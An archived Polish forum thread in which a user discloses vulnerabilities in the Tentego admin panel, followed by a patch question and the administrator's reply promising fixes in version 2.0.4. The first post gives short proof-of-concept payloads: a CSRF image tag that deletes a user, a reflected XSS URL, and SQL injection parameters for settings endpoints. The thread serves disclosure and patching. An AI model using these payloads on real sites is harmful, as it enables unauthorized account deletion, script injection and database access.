Forum służy wyłącznie jako archiwum. Nie można tworzyć nowych wątków i postów.
Tani hosting

Rozwiązane Tentego - Multiple Vulnerabilities
onmouse Offline
Użytkownik

Liczba postów: 1
Reputacja: 1
Post: #1
Tentego - Multiple Vulnerabilities 24-07-2013 22:23
[CSRF] usuwanie usera:
Kod:
<img src="http://strona.pl/admin/?go=users&feature=list&del=2"/>
+ inne do wyszukania

[XSS]

Kod:
http://target.pl/admin/?go="><img src="a.jpg" onerror=alert(/a/)>

+ persistent
Kod:
http://target.pl/admin/index.php?go=settings

Kod:
<input name="description" type="text">

itd.

[blind SQLi]
GET

Kod:
/admin/?feature=1&go=install

POST w
Kod:
admin/index.php?feature=settings&go=inbox

Kod:
active=0&bbcode=1%27%&save=Zapisz


[SQLi]
POST
Kod:
/admin/index.php?feature=settings&go=inbox

Kod:
active=1%27%22&bbcode=1&save=Zapisz
(Ten post był ostatnio modyfikowany: 06-08-2013 12:39 przez klocek.)
Cytuj
Diabeł Online
Użyszkodnik


Liczba postów: 777
Reputacja: 666
madab Offline
Donator TenTego 2.x

Liczba postów: 2
Reputacja: 0
Post: #2
RE: Tentego - Multiple Vulnerabilities 02-08-2013 12:11
Czy ktoś może wie jak to załatać?
Cytuj
klocek Offline
Administrator

Liczba postów: 3,044
Reputacja: 314
Post: #3
RE: Tentego - Multiple Vulnerabilities 02-08-2013 12:51
@madab, w kolejnej wersji TT (2.0.4), błędy te będą załatane. Nie ma się jednak czego obawiać, gdyż to błędy panelu administracyjnego. Oczywiście zawsze istnieje jakieś zagrożenie, że np. ktoś wyśle do nas linka z podatnym elementem PA, a my w niego klikniemy, gdy będziemy zalogowani do PA.
(Ten post był ostatnio modyfikowany: 02-08-2013 12:53 przez klocek.)
WWW Cytuj


Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości